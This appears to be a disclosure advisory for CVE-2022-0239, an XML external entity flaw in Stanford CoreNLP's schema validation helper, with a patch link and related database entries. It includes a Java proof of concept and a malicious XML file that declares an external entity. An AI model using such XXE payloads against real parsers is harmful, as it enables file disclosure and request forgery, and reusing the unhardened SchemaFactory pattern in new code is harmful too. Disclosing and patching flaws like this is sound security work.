Lucene search
HaxatronA717AEC2-5646-4A5F-ADE0-DADC25736AE3HistoryJan 15, 2022 - 3:28 a.m.
in stanfordnlp/corenlp
2022-01-1503:28:43
haxatron
www.huntr.dev
10
0.002 Low
EPSS
Percentile
57.2%
Description
When a malicious schema XML file is passed to getValidatingXmlParser(), the parser is vulnerable to XXE when the SchemaFactory parses the schema XML file.
public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
...
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(schemaFile);
SchemaFactory is created without FEATURE_SECURE_PROCESSING set, leaving it vulnerable to XXE when it creates a new schema from a schemaFile.
Proof of Concept
By default, SchemaFactory is vulnerable to XXE as shown by the example below:
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Schema;
import javax.xml.XMLConstants;
import java.io.File;
public class Poc {
public static void main(String[] args) {
try {
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(new File("poc.xml"));
} catch (Exception e) {
e.printStackTrace();
}
}
}
poc.xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>
Patch
https://github.com/stanfordnlp/corenlp/compare/HEAD…haxatron:fix-xxe-2
Impact
This vulnerability is capable of XXE when a developer uses this function to validate XML files against malicious schema files
Related
prion
prion
Xxe
2022-01-17 07:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-0239
2022-01-17 07:15:06
cve
cve
CVE-2022-0239
2022-01-17 07:15:06
github
github
veracode
veracode
XML External Entity (XXE)
2022-01-18 04:14:50
osv
osv
